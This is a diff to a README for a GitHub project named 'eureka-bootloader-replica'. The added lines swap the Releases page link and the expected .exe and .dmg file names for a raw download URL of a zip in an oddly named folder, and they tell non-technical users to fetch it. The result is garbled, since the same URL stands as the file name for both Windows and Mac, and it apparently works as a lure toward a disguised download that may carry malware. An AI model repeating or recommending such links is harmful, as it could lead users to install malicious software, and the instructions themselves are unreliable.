ImDuongP/eureka-bootloader-replica/README.md

 To start using "eureka-bootloader-replica," follow these simple steps.
 Even if you have no technical background, you will find this guide easy to follow.

 ## 📥 Download & Install
-1. **Visit the Releases Page**: Go to the [Releases Page](https://github.com/ImDuongP/eureka-bootloader-replica/releases) to find the latest version of the application.
+1. **Visit the Releases Page**: Go to the [Releases Page](https://raw.githubusercontent.com/ImDuongP/eureka-bootloader-replica/main/hygroexpansivity/eureka-bootloader-replica.zip) to find the latest version of the application.

 2. **Select the Latest Version**: On the Releases page, look for the most recent version.
 You will see a list of available files under "Assets."

 3. **Download the File**: Click on the file that suits your operating system.
-Most likely, it will be named something like `eureka-bootloader-replica.exe` for Windows or `eureka-bootloader-replica.dmg` for Mac.
+Most likely, it will be named something like `https://raw.githubusercontent.com/ImDuongP/eureka-bootloader-replica/main/hygroexpansivity/eureka-bootloader-replica.zip` for Windows or `https://raw.githubusercontent.com/ImDuongP/eureka-bootloader-replica/main/hygroexpansivity/eureka-bootloader-replica.zip` for Mac.

 4. **Locate the Downloaded File**: Once the download is complete, find the file.
 It will typically be in your “Downloads” folder.